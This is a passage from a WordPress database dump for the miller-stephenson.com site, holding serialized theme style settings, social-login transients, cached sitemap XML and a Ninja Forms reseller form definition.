{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}s:20:"tt_default_heading_5";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}s:20:"tt_default_heading_6";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}s:10:"tt-font-71";a:39:{s:6:"subset";s:9:"latin,all";s:7:"font_id";s:0:"";s:9:"font_name";s:0:"";s:10:"font_color";s:0:"";s:11:"font_weight";s:0:"";s:10:"font_style";s:0:"";s:17:"font_weight_style";s:0:"";s:16:"background_color";s:0:"";s:14:"stylesheet_url";s:0:"";s:15:"text_decoration";s:0:"";s:14:"text_transform";s:0:"";s:11:"line_height";s:0:"";s:7:"display";s:0:"";s:9:"font_size";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"letter_spacing";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:10:"margin_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"margin_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"margin_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"margin_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:11:"padding_top";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:13:"padding_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:14:"padding_bottom";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:12:"padding_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:22:"border_radius_top_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:23:"border_radius_top_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:26:"border_radius_bottom_right";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:25:"border_radius_bottom_left";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:16:"border_top_color";s:0:"";s:16:"border_top_style";s:0:"";s:16:"border_top_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:19:"border_bottom_color";s:0:"";s:19:"border_bottom_style";s:0:"";s:19:"border_bottom_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:17:"border_left_color";s:0:"";s:17:"border_left_style";s:0:"";s:17:"border_left_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}s:18:"border_right_color";s:0:"";s:18:"border_right_style";s:0:"";s:18:"border_right_width";a:2:{s:6:"amount";s:0:"";s:4:"unit";s:2:"px";}}}', 'yes'); 
INSERT INTO `wp_options` VALUES (691165, 'wpseo_sitemap_4860_cache_validator', 'w6k7', 'no'); 
INSERT INTO `wp_options` VALUES (691173, '_site_transient_timeout_n_nextend59974537989942.89573049', '1503089479', 'no'); 
INSERT INTO `wp_options` VALUES (691174, '_site_transient_n_nextend59974537989942.89573049', '1', 'no'); 
INSERT INTO `wp_options` VALUES (691175, '_site_transient_timeout_nextend59974537989942.89573049_fb_state', '1503089479', 'no'); 
INSERT INTO `wp_options` VALUES (691176, '_site_transient_nextend59974537989942.89573049_fb_state', 'dc8c7fcd407ef783e71b3094bcc187c9', 'no'); 
INSERT INTO `wp_options` VALUES (691177, '_site_transient_timeout_nextend59974537989942.89573049_fb_r', '1503089479', 'no'); 
INSERT INTO `wp_options` VALUES (691178, '_site_transient_nextend59974537989942.89573049_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (691551, '_site_transient_timeout_n_nextend5997ec351d7273.97565032', '1503132229', 'no'); 
INSERT INTO `wp_options` VALUES (691552, '_site_transient_n_nextend5997ec351d7273.97565032', '1', 'no'); 
INSERT INTO `wp_options` VALUES (691553, '_site_transient_timeout_nextend5997ec351d7273.97565032_fb_state', '1503132229', 'no'); 
INSERT INTO `wp_options` VALUES (691554, '_site_transient_nextend5997ec351d7273.97565032_fb_state', 'f1b3ad75ce2592b6786085b647aa34a0', 'no'); 
INSERT INTO `wp_options` VALUES (691555, '_site_transient_timeout_nextend5997ec351d7273.97565032_fb_r', '1503132229', 'no'); 
INSERT INTO `wp_options` VALUES (691556, '_site_transient_nextend5997ec351d7273.97565032_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (691590, '_site_transient_timeout_n_nextend599814836d78b1.46947804', '1503142547', 'no'); 
INSERT INTO `wp_options` VALUES (691591, '_site_transient_n_nextend599814836d78b1.46947804', '1', 'no'); 
INSERT INTO `wp_options` VALUES (691592, '_site_transient_timeout_nextend599814836d78b1.46947804_google_r', '1503142547', 'no'); 
INSERT INTO `wp_options` VALUES (691593, '_site_transient_nextend599814836d78b1.46947804_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (691794, '_site_transient_timeout_n_nextend5998ae83a8ca57.20901381', '1503181971', 'no'); 
INSERT INTO `wp_options` VALUES (691795, '_site_transient_n_nextend5998ae83a8ca57.20901381', '1', 'no'); 
INSERT INTO `wp_options` VALUES (691796, '_site_transient_timeout_nextend5998ae83a8ca57.20901381_fb_state', '1503181971', 'no'); 
INSERT INTO `wp_options` VALUES (691797, '_site_transient_nextend5998ae83a8ca57.20901381_fb_state', 'c564cb6166f1e330af4d0298222bdea6', 'no'); 
INSERT INTO `wp_options` VALUES (691798, '_site_transient_timeout_nextend5998ae83a8ca57.20901381_fb_r', '1503181971', 'no'); 
INSERT INTO `wp_options` VALUES (691799, '_site_transient_nextend5998ae83a8ca57.20901381_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (691899, '_site_transient_timeout_n_nextend59992dc6f26346.25573137', '1503214550', 'no'); 
INSERT INTO `wp_options` VALUES (691900, '_site_transient_n_nextend59992dc6f26346.25573137', '1', 'no'); 
INSERT INTO `wp_options` VALUES (691901, '_site_transient_timeout_nextend59992dc6f26346.25573137_google_r', '1503214551', 'no'); 
INSERT INTO `wp_options` VALUES (691902, '_site_transient_nextend59992dc6f26346.25573137_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (692047, '_site_transient_timeout_n_nextend5999b14362dee4.35319135', '1503248211', 'no'); 
INSERT INTO `wp_options` VALUES (692048, '_site_transient_n_nextend5999b14362dee4.35319135', '1', 'no'); 
INSERT INTO `wp_options` VALUES (692049, '_site_transient_timeout_nextend5999b14362dee4.35319135_fb_state', '1503248211', 'no'); 
INSERT INTO `wp_options` VALUES (692050, '_site_transient_nextend5999b14362dee4.35319135_fb_state', '334a14e9fbd5e69fc5edb3c5f40ea1cd', 'no'); 
INSERT INTO `wp_options` VALUES (692051, '_site_transient_timeout_nextend5999b14362dee4.35319135_fb_r', '1503248211', 'no'); 
INSERT INTO `wp_options` VALUES (692052, '_site_transient_nextend5999b14362dee4.35319135_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (692235, '_site_transient_timeout_n_nextend599a5fe26da001.18084345', '1503292914', 'no'); 
INSERT INTO `wp_options` VALUES (692236, '_site_transient_n_nextend599a5fe26da001.18084345', '1', 'no'); 
INSERT INTO `wp_options` VALUES (692237, '_site_transient_timeout_nextend599a5fe26da001.18084345_google_r', '1503292914', 'no'); 
INSERT INTO `wp_options` VALUES (692238, '_site_transient_nextend599a5fe26da001.18084345_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (692255, '_site_transient_timeout_n_nextend599a7c1a6ec9c2.61207159', '1503300138', 'no'); 
INSERT INTO `wp_options` VALUES (692256, '_site_transient_n_nextend599a7c1a6ec9c2.61207159', '1', 'no'); 
INSERT INTO `wp_options` VALUES (692257, '_site_transient_timeout_nextend599a7c1a6ec9c2.61207159_fb_state', '1503300138', 'no'); 
INSERT INTO `wp_options` VALUES (692258, '_site_transient_nextend599a7c1a6ec9c2.61207159_fb_state', '37dd76b023592efdb5aad5b52f58dd0a', 'no'); 
INSERT INTO `wp_options` VALUES (692259, '_site_transient_timeout_nextend599a7c1a6ec9c2.61207159_fb_r', '1503300138', 'no'); 
INSERT INTO `wp_options` VALUES (692260, '_site_transient_nextend599a7c1a6ec9c2.61207159_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (692295, '_site_transient_timeout_n_nextend599a9a7f2577d8.27394839', '1503307919', 'no'); 
INSERT INTO `wp_options` VALUES (692296, '_site_transient_n_nextend599a9a7f2577d8.27394839', '1', 'no'); 
INSERT INTO `wp_options` VALUES (692297, '_site_transient_timeout_nextend599a9a7f2577d8.27394839_google_r', '1503307919', 'no'); 
INSERT INTO `wp_options` VALUES (692298, '_site_transient_nextend599a9a7f2577d8.27394839_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (692341, '_transient_timeout_yst_sm_page_1:wFYf_578qc', '1503403364', 'no'); 
INSERT INTO `wp_options` VALUES (692342, '_transient_yst_sm_page_1:wFYf_578qc', 'C:24:"WPSEO_Sitemap_Cache_Data":4180:{a:2:{s:6:"status";s:2:"ok";s:3:"xml";s:4132:"<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:image="http://www.google.com/schemas/sitemap-image/1.1" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">\n	<url>\n		<loc>https://www.miller-stephenson.com/</loc>\n		<lastmod>2017-06-15T19:25:41+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/sample-page/</loc>\n		<lastmod>2016-08-15T18:57:32+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/wishlist/</loc>\n		<lastmod>2016-08-15T19:12:29+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/shop/</loc>\n		<lastmod>2016-08-15T19:19:44+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/cart/</loc>\n		<lastmod>2016-08-15T19:19:44+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/checkout/</loc>\n		<lastmod>2016-08-15T19:19:44+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/my-account/</loc>\n		<lastmod>2016-08-15T19:19:44+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/quote-list/</loc>\n		<lastmod>2016-08-26T19:29:23+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/product-listing/</loc>\n		<lastmod>2016-09-10T15:38:57+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/specialty-products-solvents/</loc>\n		<lastmod>2016-09-24T15:05:14+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/sds-access-request-form/</loc>\n		<lastmod>2016-09-28T13:19:25+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/terms-conditions/</loc>\n		<lastmod>2016-09-29T16:29:39+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/krytox-lubrication-overview/</loc>\n		<lastmod>2016-09-29T19:14:23+00:00</lastmod>\n		<image:image>\n			<image:loc>https://www.miller-stephenson.com/wp-content/uploads/2016/09/tribosys-compressor-lubricant.jpg</image:loc>\n			<image:title><![CDATA[Krytox lubricants]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/chemical-products/</loc>\n		<lastmod>2016-10-04T12:43:43+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/thank-you-for-your-inquiry/</loc>\n		<lastmod>2016-10-12T13:22:31+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/articles/</loc>\n		<lastmod>2016-10-17T18:42:07+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/releasys-release-agent/</loc>\n		<lastmod>2017-01-17T17:48:56+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/tech-support/</loc>\n		<lastmod>2017-03-10T15:10:29+00:00</lastmod>\n		<image:image>\n			<image:loc>https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_161788985.jpg</image:loc>\n			<image:title><![CDATA[shutterstock_161788985]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/news/</loc>\n		<lastmod>2017-05-02T19:40:42+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/tes/</loc>\n		<lastmod>2017-06-01T18:50:30+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/about-miller-stephenson/</loc>\n		<lastmod>2017-06-01T19:25:03+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/release-agent-applications/</loc>\n		<lastmod>2017-06-09T13:01:25+00:00</lastmod>\n		<image:image>\n			<image:loc>https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_524224879.jpg</image:loc>\n			<image:title><![CDATA[PTFE Water-based Release Agents]]></image:title>\n			<image:caption><![CDATA[ReleaSys 8200]]></image:caption>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/contact/</loc>\n		<lastmod>2017-06-13T18:15:51+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/tech-support/sds/</loc>\n		<lastmod>2017-06-16T17:39:23+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/become-a-supplier/</loc>\n		<lastmod>2017-08-08T15:37:47+00:00</lastmod>\n	</url>\n</urlset>";}}', 'no'); 
INSERT INTO `wp_options` VALUES (692345, '_transient_timeout_yst_sm_category_1:wFYf_6cXud', '1503403367', 'no'); 
INSERT INTO `wp_options` VALUES (692346, '_transient_yst_sm_category_1:wFYf_6cXud', 'C:24:"WPSEO_Sitemap_Cache_Data":1197:{a:2:{s:6:"status";s:2:"ok";s:3:"xml";s:1149:"<urlset xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:image="http://www.google.com/schemas/sitemap-image/1.1" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd" xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">\n	<url>\n		<loc>https://www.miller-stephenson.com/category/krytox-articles/</loc>\n		<lastmod>2017-08-18T19:59:02+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/category/miller-stephenson-articles/</loc>\n		<lastmod>2017-08-09T22:59:44+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/category/miller-stephenson-medical/</loc>\n		<lastmod>2017-05-17T18:53:25+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/category/opteon-articles/</loc>\n		<lastmod>2016-10-14T19:11:56+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/category/press-release/</loc>\n		<lastmod>2016-12-01T20:37:51+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://www.miller-stephenson.com/category/vazo-free-radical-initiators/</loc>\n		<lastmod>2017-06-05T19:42:39+00:00</lastmod>\n	</url>\n</urlset>";}}', 'no'); 
INSERT INTO `wp_options` VALUES (692413, '_transient_timeout_wc_report_sales_by_date', '1503498326', 'no'); 
INSERT INTO `wp_options` VALUES (692414, '_transient_wc_report_sales_by_date', 'a:14:{s:32:"f81fd870a2ec903e2ea3b53c734a27be";a:0:{}s:32:"fef49e48580ea60c6e94dbef0c020144";a:0:{}s:32:"33eb7e8ba677db1e2cac93d0a6d8ccdc";a:0:{}s:32:"81b891a5592942fa6b9c7f9cb7cd567a";N;s:32:"beba993b8dc81c7457224a15dba8bf97";a:0:{}s:32:"1cd80382d87fe68fd69e368fe1330dc8";a:0:{}s:32:"bc67ccc69d6508ae862ed79b87f0b6b1";a:0:{}s:32:"87b94034b8122281080243613c9ff5b3";a:0:{}s:32:"ebbb8c718dd2e33fe901f4cfdd24b386";a:0:{}s:32:"43f1e3c6b2145e6ef48626d8eea88a9d";a:0:{}s:32:"30d8d8943a6994e7e41f03245e63f8a4";N;s:32:"2904d16075390ac227f83f3a4407abb4";a:0:{}s:32:"15d8476c790a9036fe5a32756b30283c";a:0:{}s:32:"83a442dd8d7f1b572f0708c2e0a282e7";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (692437, '_transient_timeout_nf_form_', '1503407002', 'no'); 
INSERT INTO `wp_options` VALUES (692438, '_transient_nf_form_', 'O:7:"NF_Form":5:{s:7:"form_id";N;s:8:"settings";a:0:{}s:6:"fields";a:0:{}s:10:"field_keys";a:0:{}s:6:"errors";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (692446, '_transient_timeout_external_ip_address_10.6.194.148', '1503926101', 'no'); 
INSERT INTO `wp_options` VALUES (692447, '_transient_external_ip_address_10.6.194.148', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (692449, '_transient_timeout_nf_form_0', '1503407884', 'no'); 
INSERT INTO `wp_options` VALUES (692450, '_transient_nf_form_0', 'O:7:"NF_Form":5:{s:7:"form_id";N;s:8:"settings";a:0:{}s:6:"fields";a:0:{}s:10:"field_keys";a:0:{}s:6:"errors";a:0:{}}', 'no'); 
INSERT INTO `wp_options` VALUES (692682, '_transient_timeout_nf_form_18', '1503426472', 'no'); 
INSERT INTO `wp_options` VALUES (692683, '_transient_nf_form_18', 'O:7:"NF_Form":5:{s:7:"form_id";s:2:"18";s:8:"settings";a:7:{s:12:"date_updated";s:19:"2017-08-08 15:07:21";s:14:"clear_complete";s:1:"1";s:13:"hide_complete";s:1:"1";s:10:"show_title";s:1:"0";s:6:"status";s:0:"";s:10:"form_title";s:8:"Reseller";s:8:"last_sub";s:1:"4";}s:6:"fields";a:14:{i:33;a:7:{s:2:"id";s:2:"33";s:7:"form_id";s:2:"18";s:4:"type";s:5:"_text";s:5:"order";s:1:"0";s:4:"data";a:40:{s:5:"label";s:10:"First Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"1";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";N;s:6:"def_id";s:1:"6";}i:34;a:7:{s:2:"id";s:2:"34";s:7:"form_id";s:2:"18";s:4:"type";s:5:"_text";s:5:"order";s:1:"1";s:4:"data";a:40:{s:5:"label";s:9:"Last Name";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"0";s:9:"last_name";s:1:"1";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";N;s:6:"def_id";s:1:"7";}i:35;a:7:{s:2:"id";s:2:"35";s:7:"form_id";s:2:"18";s:4:"type";s:5:"_text";s:5:"order";s:1:"2";s:4:"data";a:40:{s:5:"label";s:7:"Company";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"1";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";N;s:6:"def_id";s:1:"6";}i:36;a:7:{s:2:"id";s:2:"36";s:7:"form_id";s:2:"18";s:4:"type";s:5:"_text";s:5:"order";s:1:"3";s:4:"data";a:40:{s:5:"label";s:8:"Industry";s:9:"label_pos";s:5:"above";s:13:"default_value";s:0:"";s:4:"mask";s:0:"";s:10:"datepicker";s:1:"0";s:5:"email";s:1:"0";s:10:"send_email";s:1:"0";s:10:"from_email";s:1:"0";s:10:"first_name";s:1:"1";s:9:"last_name";s:1:"0";s:9:"from_name";s:1:"0";s:21:"user_info_field_group";s:1:"1";s:3:"req";s:1:"1";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:17:"calc_auto_include";s:1:"0";s:11:"calc_option";s:1:"0";s:11:"conditional";s:0:"";s:11:"placeholder";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:13:"disable_input";s:1:"0";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:15:"input_limit_msg";s:0:"";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}s:6:"fav_id";N;s:6:"def_id";s:1:"6";}i:45;a:7:{s:2:"id";s:2:"45";s:7:"form_id";s:2:"18";s:4:"type";s:5:"_text";s:5:"order";s:1:"4";s:4:"data";a:35:{s:5:"label";s:14:"Annual Revenue";s:15:"input_limit_msg";s:17:"character(s) 